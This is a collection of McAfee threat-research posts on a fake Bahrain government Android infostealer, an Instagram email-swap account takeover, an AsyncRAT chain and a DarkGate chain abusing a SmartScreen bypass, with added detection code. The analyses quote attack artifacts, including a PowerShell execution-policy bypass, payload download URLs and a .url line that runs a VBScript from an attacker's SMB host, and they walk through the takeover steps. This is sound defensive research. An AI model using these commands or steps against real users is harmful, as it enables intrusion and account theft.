It’s been almost two years since OpenAI launched ChatGPT, driving increased mainstream awareness of and access to Generative AI tools. In that time, new tools and solutions seem to be launching daily. There is also a growing trend of building bigger models that consume larger quantities of training data, often with mixed results ranging from hallucinations or categorically incorrect facts to the regurgitation of opinions as universal truth, proving the old adage that sometimes “less is more”.
So, if using more data doesn’t translate into better results… what does? It comes down to another tried and true saying – “quality over quantity.”
At McAfee, we maniacally focus on data quality. A well-developed Generative AI model is nothing without high-quality, curated datasets to fuel it. When the quantity of data is prioritized over quality, the results are often disappointing.
How do we produce quality data? Using millions of worldwide sensors, our AI engineers and AI data specialists focus on clues that point to threats. But that’s just the first step. Our teams then curate the data to improve the quality and maximize data diversity, reducing sources of bias, cross-pollinating data sources, and enriching and standardizing samples, just to name a few of the dozens of operations conducted to ensure we’re building datasets of the highest and purest quality.
All of this translates into the most comprehensive and robust AI-based protection for our customers: more than 1.5M threat detections per week across malware, scams, phishing, smishing, and more than half a billion web categorizations to help ensure a safe digital journey while browsing the Internet.
As the capabilities of AI tools increase, so does the conversation around how technology removes humans from the equation. The reality is that humans are still an integral part of the process and key to any successful Generative AI strategy. AI is only as good as the data it’s trained on, and in McAfee’s case, the guidance provided by cybersecurity experts. Thus, having cybersecurity AI specialists curate the data is crucial to the development of all of our AI systems: it mitigates potential sources of error, yields accurate and trusted AI solutions, and allows us to scale and share human expertise to better protect millions of customers worldwide.
Tackling cyber threats is a tall order that comes with intrinsic challenges. For example, modern scams are more subtle and less obvious even to experts, and quite often it is just the implicit intent that sets them apart from genuine (non-scam) content. Being context-aware can help navigate this landscape to more effectively detect and stop threats before they reach customers. What is more, we believe transparency and education are paramount for building a safer digital world. This is why we also invest in building explainable AI that helps users understand why a threat has been flagged and provides clues they can use to identify future threats.
The GenAI journey has only just begun. There is still a lot of work to do and a lot to look forward to as this technology continues to evolve. While it’s easy, as developers, to get caught up in the excitement, it’s also important to identify and focus on an ultimate goal and the responsible and safe steps to get there. At McAfee, we pledge to protect our customers, and we believe in the synergistic interaction between AI and Human Threat Intelligence. Together, we can deliver a trusted, world-class AI protection experience.
The post Quality Over Quantity: the Counter-Intuitive GenAI Key appeared first on McAfee Blog.
Authored by Dexter Shin
Many government agencies provide their services online for the convenience of their citizens. Also, if this service could be provided through a mobile app, it would be very convenient and accessible. But what happens when malware pretends to be these services?
McAfee Mobile Research Team found an InfoStealer Android malware pretending to be a government agency service in Bahrain. This malware poses as the official app of Bahrain and advertises that users can renew or apply for driver’s licenses, visas, and ID cards on mobile. Users who believe the advertisements that these services are available on mobile will enter the personal information the services supposedly require without hesitation. The apps reach users in various ways, including Facebook and SMS messages. Users who are not familiar with these attacks easily make the mistake of sending their personal information.
In Bahrain, there’s a government agency called the Labour Market Regulatory Authority (LMRA). This agency operates with full financial and administrative independence under the guidance of a board of directors chaired by the Minister of Labour. They provide a variety of mobile services, and most apps provide only one service per app. However, this fake app promotes providing more than one service.
Figure 1. Legitimate official LMRA website
Figure 2. Fake app named LMRA
Apart from the most frequently found fake apps impersonating LMRA, there are various other fake apps, including ones impersonating the Bank of Bahrain and Kuwait (BBK), BenefitPay (a fintech company in Bahrain), and even apps claiming to be related to Bitcoin or loans. These apps use the same techniques as the LMRA fake apps to steal personal information.
Figure 3. Various fake apps using the same techniques
From the types of apps this malware impersonates, we can infer that its purpose is financial fraud using the stolen personal information. Moreover, this campaign has already affected real users, as shown in the picture below.
Figure 4. Victims of financial fraud (Source: Reddit)
They distribute these apps using Facebook pages and SMS messages. The Facebook pages are fake, and the malware author is constantly creating new ones. These pages direct users to phishing sites, either WordPress blogs or custom sites designed to download the apps.
Figure 5. Facebook profile and page with a link to the phishing site
Figure 6. One of the phishing sites designed to download app
In the case of SMS, social engineering messages are sent to create a sense of urgency, tricking users into clicking a link to “confirm” their details immediately.
Figure 7. Phishing message using SMS (Source: Reddit)
When the user launches the app, it shows a large copy of the legitimate icon so that users mistake it for the official app. It then asks for the CPR and phone number. The CPR number is a unique 9-digit identifier given to each resident in Bahrain. There is a “Verify” button, but it simply sends the information to the C2 server. If users input their information, the app goes directly to the next screen without any verification. This step just stores the information for the next step.
Figure 8. The first screen (left) and next screen of a fake app (right)
There are various menus, but they are all linked to the same URL. The parameter value is the CPR and phone numbers input by the user on the first screen.
Figure 9. All menus are linked to the same URL
The last page asks for the user’s full name, email, and date of birth. After entering everything and clicking the “Send” button, all information entered so far is sent to the malware author’s C2 server.
Figure 10. All data sent to C2 server
After sending, it shows a completion page to trick the user. It shows a message saying you will receive an email within 24 hours. But it is just a counter that decreases automatically. So, it does nothing after 24 hours. In other words, while users are waiting for the confirmation email for 24 hours, cybercriminals will exploit the stolen information to steal victims’ financial assets.
Figure 11. Completion page to trick users
In addition, they have a payload for stealing SMS. This app registers a receiver that runs when an SMS is received. So as soon as an SMS arrives, the app forwards the message to the C2 server without notifying the user.
Figure 12. Payload for stealing SMS
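The SMS-stealing behaviour above is visible statically before the app ever runs: it needs the RECEIVE_SMS permission and a broadcast receiver registered for the SMS_RECEIVED action. The following is an added example (not McAfee’s code and not taken from the analysed APK) that parses a decoded AndroidManifest.xml, such as apktool produces, and reports that pairing. The two manifests embedded in it are constructed samples; the package names and receiver names are invented for illustration.

```python
"""Static check for the SMS-interception capability described above.

Added example, not code from McAfee or from the analysed APK: it parses an
AndroidManifest.xml (as produced by apktool or aapt) and reports the pairing
of the RECEIVE_SMS permission with a receiver registered for the
SMS_RECEIVED broadcast.  The manifests below are constructed samples.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
SMS_RECEIVED_ACTION = "android.provider.Telephony.SMS_RECEIVED"
RECEIVE_SMS_PERM = "android.permission.RECEIVE_SMS"

# Constructed sample shaped like the stealer: a "service" app with an SMS receiver.
SAMPLE_SUSPICIOUS_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakeservice">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <application android:label="Example Service">
    <activity android:name=".MainActivity"/>
    <receiver android:name=".SmsReceiver" android:exported="true">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Constructed benign sample for contrast: same kind of app, no SMS access.
SAMPLE_BENIGN_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.realservice">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Real Service">
    <activity android:name=".MainActivity"/>
  </application>
</manifest>
"""


def android_attr(element, name):
    """Read an android:-namespaced attribute from a manifest element."""
    return element.get("{%s}%s" % (ANDROID_NS, name))


def analyse_manifest(xml_text):
    """Return package, permissions, SMS receivers and human-readable findings."""
    root = ET.fromstring(xml_text)
    permissions = {android_attr(p, "name") for p in root.iter("uses-permission")}

    sms_receivers = []
    for receiver in root.iter("receiver"):
        for intent_filter in receiver.findall("intent-filter"):
            actions = {android_attr(a, "name") for a in intent_filter.findall("action")}
            if SMS_RECEIVED_ACTION in actions:
                sms_receivers.append({
                    "receiver": android_attr(receiver, "name"),
                    "exported": android_attr(receiver, "exported") == "true",
                    "priority": int(android_attr(intent_filter, "priority") or 0),
                })

    findings = []
    if RECEIVE_SMS_PERM in permissions and sms_receivers:
        findings.append("app can read incoming SMS: RECEIVE_SMS plus an SMS_RECEIVED receiver")
    for entry in sms_receivers:
        if entry["priority"] > 0:
            findings.append("%s registers SMS_RECEIVED with elevated priority %d"
                            % (entry["receiver"], entry["priority"]))

    return {
        "package": root.get("package"),
        "permissions": sorted(permissions),
        "sms_receivers": sms_receivers,
        "findings": findings,
    }


if __name__ == "__main__":
    for label, manifest in (("suspicious", SAMPLE_SUSPICIOUS_MANIFEST),
                            ("benign", SAMPLE_BENIGN_MANIFEST)):
        report = analyse_manifest(manifest)
        print(label, report["package"], report["findings"])
```

A government-services app that only collects form data has no reason to declare RECEIVE_SMS at all, so the first finding alone is enough to pull a sample for manual review; the priority check is an extra signal, since a high intent-filter priority is what lets a receiver see a message before the default messaging app does.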
We confirmed that there are two types of these apps. There is a type that implements a custom C2 server and receives data directly through web API, and another type is an app that uses Firebase. Firebase is a backend service platform provided by Google. Among many services, Firestore can store data as a database. This malware uses Firestore. Because it is a legitimate service provided by Google, it is difficult to detect as a malicious URL.
Apps that use Firebase dynamically load the phishing URL stored in Firestore. Therefore, even if a phishing site is blocked, the author can respond quickly and keep already-installed apps working for existing victims simply by changing the URL stored in Firestore.
Figure 13. Dynamically loading phishing site loaded in webview
According to our detection telemetry data, 62 users in Bahrain have already used this app. However, since this is the number at the time of writing, it is expected to keep increasing, considering that new Facebook pages are still being actively created.
Recent malware tends to target specific countries or users rather than carrying out widespread attacks. These attacks may be difficult for general users to distinguish because the malware accurately reproduces the elements that users living in a specific country expect. So we recommend that users install security software to protect their devices. Also, users are encouraged to download and use apps from official app stores like the Google Play Store or Apple App Store. If you can’t find an app in these stores, download only the app provided on the official website.
McAfee Mobile Security already detects this threat as Android/InfoStealer. For more information, visit McAfee Mobile Security.
Samples:
| SHA256 | Package Name | App Name |
| --- | --- | --- |
| 6f6d86e60814ad7c86949b7b5c212b83ab0c4da65f0a105693c48d9b5798136c | com.ariashirazi.instabrowser | LMRA |
| 5574c98c9df202ec7799c3feb87c374310fa49a99838e68eb43f5c08ca08392d | com.npra.bahrain.five | LMRA Bahrain |
| b7424354c356561811e6af9d8f4f4e5b0bf6dfe8ad9d57f4c4e13b6c4eaccafb | com.npra.bahrain.five | LMRA Bahrain |
| f9bdeca0e2057b0e334c849ff918bdbe49abd1056a285fed1239c9948040496a | com.lmra.nine.lmranine | LMRA |
| bf22b5dfc369758b655dda8ae5d642c205bb192bbcc3a03ce654e6977e6df730 | com.stich.inches | Visa Update |
| 8c8ffc01e6466a3e02a4842053aa872119adf8d48fd9acd686213e158a8377ba | com.ariashirazi.instabrowser | EasyLoan |
| 164fafa8a48575973eee3a33ee9434ea07bd48e18aa360a979cc7fb16a0da819 | com.ariashirazi.instabrowser | BTC Flasher |
| 94959b8c811fdcfae7c40778811a2fcc4c84fbdb8cde483abd1af9431fc84b44 | com.ariashirazi.instabrowser | BenefitPay |
| d4d0b7660e90be081979bfbc27bbf70d182ff1accd829300255cae0cb10fe546 | com.lymors.lulumoney | BBK Loan App |
Domains:
Firebase (for C2):
The post Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud appeared first on McAfee Blog.
Authored by Vignesh Dhatchanamoorthy, Rachana S
Instagram, with its vast user base and dynamic platform, has become a hotbed for scams and fraudulent activities. From phishing attempts to fake giveaways, scammers employ a range of tactics to exploit user trust and vulnerability. These scams often prey on people’s desire for social validation, financial gain, or exclusive opportunities, luring them into traps that can compromise their personal accounts and identity.
McAfee has observed a concerning scam emerging on Instagram, where scammers are exploiting the platform’s influencer program to deceive users. This manipulation of the influencer ecosystem underscores the adaptability and cunning of online fraudsters in their pursuit of ill-gotten gains.
The Instagram influencer program, designed to empower content creators and influencers by providing opportunities for collaboration and brand partnerships, has inadvertently become a target for exploitation. Scammers are leveraging the allure of influencer status to lure unsuspecting individuals into fraudulent schemes, promising fame, fortune, and exclusive opportunities in exchange for participation.
The first step involves a cybercrook creating a dummy account and using it to hack into a target’s Instagram account. Using those hacked accounts, the hackers then share posts about Bitcoin and other cryptocurrencies. Finally, the hacked accounts are used to scam the target’s friends with a request that they vote for them to win an influencer contest.
After this series of steps is complete, the scammer will first identify the target and then send them a link with a Gmail email address to vote in their favor.
Fig 1: Scammer Message
While the link in the voting request message likely leads to a legitimate Instagram page, victims are often directed to an Instagram email update page upon clicking — not the promised voting page. Also, since the account sending the voting request is likely familiar to the scam target, they are more likely to enter the scammer’s email ID without examining it closely.
During our research, we saw scammers send their targets an Instagram Accounts Center link like the one below: hxxp[.]//accountscenter.instagram.com/personal_info/contact_points/contact_point_type=email&dialog_type=add_contact_point
Fig 2. Email Updating Page
We took this opportunity to gain more insight into how these deceptive tactics are carried out, creating two email accounts (scammerxxxx.com and victimxxxx.com) and a dummy Instagram account registered with the victimxxxx.com address for testing purposes.
Fig 3. Victim’s Personal Details
We visited the URL provided in the chat and entered our testing email ID scammerxxxx.com instead of entering the email address provided by the scammer, which was “vvote8399@gmail.com”.
Fig 4. Adding Scammer’s Email Address in Victim Account
After adding the scammerxxxx.com address in the email address field, we received a notification stating, “Adding this email will replace victimxxxx.com on this Instagram account”.
This is the point at which a scam target will fall victim to this type of scam if they are not aware that they are giving someone else, with access to the scammerxxxx.com email address, control of their Instagram account.
After selecting Next, we were redirected to the confirmation code page. Here, scammers will send the confirmation code received in their email account and provide that code to victims, via an additional Instagram message, to complete the email updating process.
In our testing case, the verification code was sent to the email address scammerxxxx.com.
Fig 5. Confirmation Code Page
We received the verification code in our scammerxxxx.com account and submitted it on the confirmation code page.
Fig 6. Confirmation Code Mail
Once the ‘Add an Email Address’ procedure is completed, the scammer’s email address is linked to the victim’s Instagram account. As a result, the actual user will be unable to log in to their account due to the updated email address.
Fig 7. Victim’s Profile after updating Scammer’s email
Because the account’s email address was changed to the scammer’s (scammerxxxx.com), the account owner, the scam victim, will not be able to access their account and will instead receive the message “Sorry, your password was incorrect. Please double-check your password.”
Fig 8. Victim trying to login to their account.
The scammer will now change the victim’s account password by using the “forgot password” function with the new, scammer email login ID.
Fig 9. Forgot Password Page
The password reset code will be sent to the scammer’s email address (scammerxxxx.com).
Fig 10. Reset the Password token received in the Scammer’s email
After getting the email, the scammer will “Reset your password” for the victim’s account.
Fig 11. Scammer Resetting the Password
After resetting the password, the scammer can take over the victim’s Instagram account.
Fig 12. The scammer took over the victim’s Instagram account.
The post How Scammers Hijack Your Instagram appeared first on McAfee Blog.
Authored by Yashvi Shah and Preksha Saxena
AsyncRAT, also known as “Asynchronous Remote Access Trojan,” is a highly sophisticated malware variant meticulously crafted to breach computer systems’ security and steal confidential data. McAfee Labs has recently uncovered a novel infection chain, shedding light on its potency and the various security bypass mechanisms it employs.
It utilizes a variety of file types, such as PowerShell, Windows Script File (WSF), VBScript (VBS), and others within a malicious HTML file. This multifaceted approach aims to circumvent antivirus detection methods and facilitate the distribution of infection.
Figure 1: AsyncRAT prevalence for the last one month
The infection initiates through a spam email containing an HTML page attachment. Upon unwittingly opening the HTML page, an automatic download of a Windows Script File (WSF) ensues. This WSF file is deliberately named in a manner suggestive of an Order ID, fostering the illusion of legitimacy and enticing the user to execute it. Subsequent to the execution of the WSF file, the infection progresses autonomously, necessitating no further user intervention. The subsequent stages of the infection chain encompass the deployment of Visual Basic Script (VBS), JavaScript (JS), Batch (BAT), Text (TXT), and PowerShell (PS1) files. Ultimately, the chain culminates in a process injection targeting aspnet_compiler.exe.
Figure 2: Infection Chain
Upon opening a spam email, the recipient unwittingly encounters a web link embedded within its contents. Upon clicking on the link, it triggers the opening of an HTML page. Simultaneously, the page initiates the download of a WSF (Windows Script File), setting into motion a potentially perilous sequence of events.
Figure 3: HTML page
The HTML file initiates the download of a WSF file. Disguised as an order-related document with numerous blank lines, the WSF file conceals malicious intent. After its execution, no user interaction is required.
On executing the WSF file, we get the following process tree:
Figure 4: Process tree
Figure 5: Content of WSF file
The downloaded text file, named “1.txt,” contains specific lines of code. These lines are programmed to download another file, referred to as “r.jpg,” but it is actually saved in the public folder under the name “ty.zip.” Subsequently, this zip file is extracted within the same public folder, resulting in the creation of multiple files.
Figure 6: Marked files are extracted in a public folder
a) The “ty.zip” file comprises 17 additional files. Among these, the file named “basta.js” is the first to be executed. The content of “basta.js” is as follows:
Figure 7: basta.js
b) “basta.js” invokes the “node.bat” file from the same folder.
Figure 8: node.js
Explaining the command present in node.bat:
To summarize, the command sets up a scheduled task called “cafee” which is designed to execute the “app.js” script found in the C:\Users\Public\ directory every 2 minutes. The primary purpose of this script is to maintain persistence on the system.
Figure 9: Schedule task entry
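The persistence mechanism described above (a scheduled task that re-runs a script from C:\Users\Public every two minutes) is cheap to hunt for in process-creation telemetry. The following is an added example, not McAfee’s code and not the literal content of node.bat, which the post does not reproduce: it parses schtasks /create command lines and flags tasks whose action launches a script host from a user-writable directory on a very short repeat interval. The two command lines in it are constructed: the first is modelled on the “cafee” task as the post describes it, the second is a benign task for contrast.

```python
"""Triage of schtasks command lines for the persistence pattern described above.

Added example, not McAfee's code and not the literal content of node.bat (the
post does not reproduce it).  The command lines below are constructed to match
the description: a task that runs a script from C:\\Users\\Public every 2 minutes,
beside a benign task for contrast.  Feed it lines from process-creation
telemetry (e.g. Sysmon event 1 CommandLine) to find similar tasks.
"""
import re

# /flag, optionally followed by a quoted or bare value (a following /flag is not a value)
FLAG_RE = re.compile(
    r'/(?P<flag>[a-z]+)(?:\s+(?:"(?P<quoted>[^"]*)"|(?P<bare>[^/\s]\S*)))?', re.I)

SCRIPT_HOSTS = ("wscript", "cscript", "powershell", "pwsh", "mshta")
USER_WRITABLE = ("c:\\users\\public", "\\appdata\\", "c:\\programdata", "\\temp\\")

SAMPLE_CMDLINES = [
    # constructed: mirrors the "cafee" task as the post describes it
    'schtasks /create /sc minute /mo 2 /tn "cafee" /tr "wscript C:\\Users\\Public\\app.js" /f',
    # constructed benign task for contrast
    'schtasks /create /sc daily /st 02:00 /tn "NightlyBackup" /tr "C:\\Program Files\\Backup\\backup.exe" /ru SYSTEM',
]


def parse_schtasks(cmdline):
    """Map each /flag to its value (None for valueless flags such as /f)."""
    options = {}
    for match in FLAG_RE.finditer(cmdline):
        value = match.group("quoted")
        if value is None:
            value = match.group("bare")
        options[match.group("flag").lower()] = value
    return options


def interval_minutes(options):
    """Translate /sc and /mo into a repeat interval in minutes (None if not periodic)."""
    schedule = (options.get("sc") or "").lower()
    modifier = int(options.get("mo") or 1)
    return {"minute": modifier, "hourly": 60 * modifier, "daily": 1440 * modifier}.get(schedule)


def triage_schtasks(cmdline):
    """Return a dict describing the task creation and why it looks suspicious."""
    options = parse_schtasks(cmdline)
    if "create" not in options:
        return None
    action = (options.get("tr") or "").lower()
    reasons = []
    if any(host in action for host in SCRIPT_HOSTS) and any(p in action for p in USER_WRITABLE):
        reasons.append("script host launched from a user-writable directory")
    minutes = interval_minutes(options)
    if minutes is not None and minutes <= 5:
        reasons.append("re-executes every %d minute(s)" % minutes)
    return {"task": options.get("tn"), "action": options.get("tr"),
            "interval_minutes": minutes, "reasons": reasons}


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(triage_schtasks(line))
```

The same two conditions translate directly into a detection rule: a task action that names a script host together with a path under C:\Users\Public, AppData, ProgramData or a temp directory, combined with a minute-level schedule. Legitimate software rarely needs both at once.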
c) Now “app.js” is executed, and it in turn executes “t.bat” from the same folder.
Figure 10: app.js
d) “t.bat” contains lightly obfuscated code which, after concatenation, becomes: Powershell.exe -ExecutionPolicy Bypass -File “C:\Users\Public\t.ps1”
Figure 11: Content of t.bat
e) Now the PowerShell script “t.ps1” is invoked. This is the main script, responsible for the injection.
Figure 12: Content of t.ps1
There are 2 functions defined in it:
A) function fun_alosh()
This function is used at the end to decode $tLx and $Uk.
B) Function FH ()
This function is used only once to decode the content of “C:\\Users\\Public\\Framework.txt”. This function takes a binary string as input, converts it into a sequence of ASCII characters, and returns the resulting string.
Figure 13: Content of Framework.txt
After decoding the contents of “C:\Users\Public\Framework.txt” using CyberChef, we are able to reveal the name of the final binary file targeted for injection.
Figure 14: Binary to Hex, Hex to Ascii Conversion using CyberChef
This technique aims to evade detection by concealing suspicious keywords within the script. In the same way, other keywords are also stored in text files, such as:
The contents of the other text files are:
Figure 15: Content of other files
After substituting all the names and reassembling the statements, the result is below.
Figure 16: Injection code
Now, the two variables left are decrypted by fun_alosh.
After decrypting and saving them, it was discovered that both files are PE files, with one being a DLL ($tLx) and the other an exe ($Uk).
Figure 17: Decoded binaries
Process injection in aspnet_compiler.exe.
Figure 18: Process injection in aspnet_compiler.exe
Once all background tasks are finished, a deceptive Amazon page emerges solely to entice the user.
Figure 19: Fake Amazon page
The DLL file is packed with ConfuserEx and, as shown, the type is ‘NewPE2.PE’ and the method is ‘Execute’.
Figure 20: Confuser packed DLL
The second file, named AsyncClient123, is highly obfuscated.
Figure 21: AsyncRat payload
To summarize the main execution flow of “AsyncRAT”, we can outline the following steps:
The decrypting function is used to decrypt strings.
Figure 22: Decrypting Function
The program creates a mutex to prevent multiple instances from running simultaneously.
Figure 23: Creating Mutex
Figure 24: Mutex in process explorer
Checking the presence of a debugger.
Figure 25: Anti analysis code
Collecting data from the system.
Figure 26: Code for collecting data from system
Establish a connection with the server.
Figure 27: Code for C2 connection
Process injection in aspnet_compiler.exe:
Figure 28: C2 communication
In this blog post, we dissect the entire attack sequence of AsyncRAT, beginning with an HTML file that triggers the download of a WSF file, and culminating in the injection of the final payload. Such tactics are frequently employed by attackers to gain an initial foothold. We anticipate a rise in the utilization of these file types following Microsoft’s implementation of protections against malicious Microsoft Office macros, which have also been widely exploited for malware delivery. McAfee Labs consistently advises users to refrain from opening files from unknown sources, particularly those received via email. For organizations, we highly recommend conducting security training for employees and implementing a secure web gateway equipped with advanced threat protection. This setup enables real-time scanning and detection of malicious files, enhancing organizational security.
Avoiding falling victim to email phishing involves adopting a vigilant and cautious approach. Here are some common practices to help prevent falling prey to email phishing:
| File | SHA256 / URL |
| --- | --- |
| HTML | 969c50f319a591b79037ca50cda55a1bcf2c4284e6ea090a68210039034211db |
| WSF | ec6805562419e16de9609e2a210464d58801c8b8be964f876cf062e4ab52681a |
| ty.zip | daee41645adcf22576def12cb42576a07ed5f181a71d3f241c2c14271aad308b |
| basta.js | 909ec84dfa3f2a00431a20d4b8a241f2959cac2ea402692fd46f4b7dbf247e90 |
| node.bat | 569e33818e6af315b5f290442f9e27dc6c56a25259d9c9866b2ffb4176d07103 |
| app.js | 7d8a4aa184eb350f4be8706afb0d7527fca40c4667ab0491217b9e1e9d0f9c81 |
| t.bat | e2d30095e7825589c3ebd198f31e4c24e213d9f43fc3bb1ab2cf06b70c6eac1d |
| t.ps1 | a0c40aa214cb28caaf1a2f5db136bb079780f05cba50e84bbaeed101f0de7fb3 |
| exe | 0d6bc7db43872fc4d012124447d3d050b123200b720d305324ec7631f739d98d |
| dll | b46cd34f7a2d3db257343501fe47bdab67e796700f150b8c51a28bb30650c28f |
| URL | hxxp://142.202.240[.]40:222/1.txt |
| URL | hxxp://142.202.240[.]40:222/r.jpg |
The post From Spam to AsyncRAT: Tracking the Surge in Non-PE Cyber Threats appeared first on McAfee Blog.
Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena
McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware. This chain commences with an HTML-based entry point and progresses to exploit the AutoHotkey utility in its subsequent stages. DarkGate, a Remote Access Trojan (RAT) developed using Borland Delphi, has been marketed as a Malware-as-a-Service (MaaS) offering on a Russian-language cybercrime forum since at least 2018. This malicious software boasts an array of functionalities, such as process injection, file download and execution, data theft, shell command execution, keylogging capabilities, among others. Following is the spread of DarkGate observed in our telemetry for the last three months:
Figure 1: Geo-Distribution of DarkGate
Additionally, DarkGate incorporates numerous evasion tactics to circumvent detection. DarkGate notably circumvented Microsoft Defender SmartScreen, prompting Microsoft to subsequently release a patch to address this vulnerability.
In the previous year, CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025 ) was identified and subsequently patched https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025 . CVE-2023-36025 is a vulnerability impacting Microsoft Windows Defender SmartScreen. This flaw arises from the absence of proper checks and corresponding prompts related to Internet Shortcut (.url) files. Cyber adversaries exploit this vulnerability by creating malicious .url files capable of downloading and executing harmful scripts, effectively evading the warning and inspection mechanisms of Windows Defender SmartScreen. This year, in the same way, CVE-2024-21412 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21412 ) was identified and patched. This vulnerability is described as an “Internet Shortcut Files Security Feature Bypass Vulnerability”.
McAfee Labs has identified two distinct initial vectors carrying identical DarkGate shellcode and payload. The first vector originates from an HTML file, while the second begins with an XLS file. We will delve into each chain individually to unveil their respective mechanisms. Below is the detailed infection chain for the same:
Figure 2: Infection Chain
The infection chain initiates with a phishing HTML page masquerading as a Word document. Users are prompted to open the document in “Cloud View” (shown in the figure below), creating a deceptive lure for unwitting individuals to interact with malicious content.
Figure 3: HTML page
Upon clicking “Cloud View,” users are prompted to grant permission to open Windows Explorer, facilitating the subsequent redirection process.
Figure 4: Prompt confirming redirection to Windows Explorer
Upon granting permission and opening Windows Explorer, users encounter a file depicted within the Windows Explorer interface. The window title prominently displays “\\onedrive.live.com,” adding a veneer of legitimacy to the purported “Cloud View” experience.
Figure 5: Share Internet Shortcut via SMB
In our investigation, we sought to trace the origin of the described phishing scheme back to its parent HTML file. Upon inspection, it appears that the highlighted content in the image may be a string encoded in reverse Base64 format. This suspicion arises from the presence of a JavaScript function (shown in the figure below) designed to reverse strings, which suggests an attempt to decode or manipulate encoded data.
Figure 6: JavaScript in HTML code
On reversing and base64 decoding the yellow highlighted content in Figure 6, we found:
Figure 7: WebDAV share
The URL utilizes the “search-ms” application protocol to execute a search operation for a file named “Report-26-2024.url”. The “crumb” parameter is employed to confine the search within the context of the malicious WebDAV share, restricting its scope. Additionally, the “DisplayName” element is manipulated to mislead users into believing that the accessed resource is associated with the legitimate “onedrive.live.com” folder, thereby facilitating deception.
Hence, the presence of “onedrive.live.com” in the Windows Explorer window title is a direct consequence of the deceptive manipulation within the URL structure.
The file is an Internet Shortcut (.url) file, containing the following content:
Figure 8: content of .URL file
The .url files serve as straightforward INI configuration files, typically consisting of a “URL=” parameter indicating a specific URL. In our scenario, the URL parameter is defined as follows: URL=file://170.130.55.130/share/a/Report-26-2024.zip/Report-26-2024.vbs.
Upon execution of the .url file, it will initiate the execution of the VBScript file specified in the URL parameter. This process allows for the automatic execution of the VBScript file, potentially enabling the execution of malicious commands or actions on the system.
The vulnerability CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025 ) pertains to Microsoft Windows Defender SmartScreen failing to issue a security prompt prior to executing a .url file from an untrusted source. Attackers exploit this by constructing a Windows shortcut (.url) file that sidesteps the SmartScreen protection prompt. This evasion is achieved by incorporating a script file as a component of the malicious payload delivery mechanism. Although Microsoft has released a patch https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025 to address this vulnerability, it remains exploitable in unpatched versions of Windows.
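Both lure artifacts in this chain are plain text and can be checked automatically: the search-ms: URI carries its crumb (location) and DisplayName as ordinary query parameters, and the .url file is an INI file with a URL= key. The following is an added example, not McAfee’s code, that parses each and reports the properties that mark them as lures: a search scoped to a remote share whose DisplayName claims a different host, a query for a shortcut file, and a URL= target that is a remote file:// path to a script inside an archive. The .url content uses the URL quoted above; the search-ms URI is constructed to match the post’s description and is not the literal one from the HTML file.

```python
"""Parsers for the two lure artifacts described above: the search-ms: URI that
scopes Explorer to a remote WebDAV share under a misleading DisplayName, and the
Internet Shortcut (.url) file whose URL= line points at a remote VBScript.

Added example, not McAfee's code.  The .url content uses the URL quoted in the
post; the search-ms URI is constructed to match the post's description (query,
crumb, DisplayName) and is not the literal one from the HTML file.
"""
import configparser
import re
from urllib.parse import parse_qs, urlsplit

SCRIPT_EXTENSIONS = (".vbs", ".js", ".wsf", ".ps1", ".bat", ".cmd", ".hta")

# Constructed to match the description: search for the .url on the attacker share.
SAMPLE_SEARCH_MS = ("search-ms:query=Report-26-2024.url"
                    "&crumb=location:\\\\170.130.55.130@80\\share\\a"
                    "&DisplayName=onedrive.live.com")

# INI-style shortcut with the URL= value given in the post.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=file://170.130.55.130/share/a/Report-26-2024.zip/Report-26-2024.vbs
"""


def parse_search_ms(uri):
    """Split a search-ms: URI and explain why it is a lure (None if not search-ms)."""
    scheme, _, query_string = uri.partition(":")
    if scheme.lower() != "search-ms":
        return None
    params = {k.lower(): v[0] for k, v in
              parse_qs(query_string, keep_blank_values=True).items()}
    crumb = params.get("crumb", "")
    host_match = re.match(r"location:\\\\([^\\@]+)", crumb, re.I)  # \\host or \\host@port
    host = host_match.group(1) if host_match else None
    display = params.get("displayname", "")
    query = params.get("query", "").lower()

    findings = []
    if host:
        findings.append("search scoped to remote share on %s" % host)
    if host and display and display.lower() not in host.lower():
        findings.append("DisplayName '%s' does not match share host %s" % (display, host))
    if query.endswith((".url",) + SCRIPT_EXTENSIONS):
        findings.append("query targets a shortcut or script file: %s" % query)
    return {"host": host, "display_name": display, "query": query, "findings": findings}


def parse_internet_shortcut(text):
    """Read the URL= line of a .url file and flag remote script targets."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string(text)
    url = cp.get("InternetShortcut", "URL", fallback=None)
    if url is None:
        return {"url": None, "host": None, "findings": ["no URL= entry"]}
    parts = urlsplit(url)
    path = parts.path.lower()
    findings = []
    if parts.scheme.lower() == "file" and parts.netloc:
        findings.append("file:// target on remote host %s" % parts.netloc)
    if path.endswith(SCRIPT_EXTENSIONS):
        findings.append("target is a script file")
    if ".zip/" in path:
        findings.append("target path reaches inside an archive")
    return {"url": url, "host": parts.netloc, "findings": findings}


if __name__ == "__main__":
    print(parse_search_ms(SAMPLE_SEARCH_MS))
    print(parse_internet_shortcut(SAMPLE_URL_FILE))
```

The DisplayName check is the one that explains the Explorer title bar in Figure 5: the name shown to the user is whatever the URI says it is, independent of where the crumb actually points. On the mail gateway or in an HTML sandbox, any search-ms: URI whose crumb names an external host is worth blocking outright, and a .url whose URL= is a file:// path to a script on a remote host has no legitimate use.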
If your system is not patched and updated, you will not see any prompt. However, if your system is updated, you will encounter a prompt like:
Figure 9: SmartScreen prompt
